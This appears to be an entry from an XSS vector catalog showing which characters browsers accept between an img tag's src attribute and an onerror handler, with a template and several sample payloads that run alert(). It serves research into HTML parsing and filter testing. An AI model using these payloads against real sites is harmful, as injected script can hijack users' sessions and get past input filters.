Characters allowed before event handler

This XSS vector shows what characters can be used before the onerror event.

Novice Fuzzer

Created byAyushXtha

Created Mar 12, 2026

Updated Mar 12, 2026

Detecting browser...

CategoryHTML Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<img src$[chr]onerror=log($[i])>

Sample payloads

<img src0x09onerror=alert(9)>

<img src
onerror=alert(10)>

<img src0x0Conerror=alert(12)>

<img src0x0Donerror=alert(13)>

<img src onerror=alert(32)>

<img src/onerror=alert(47)>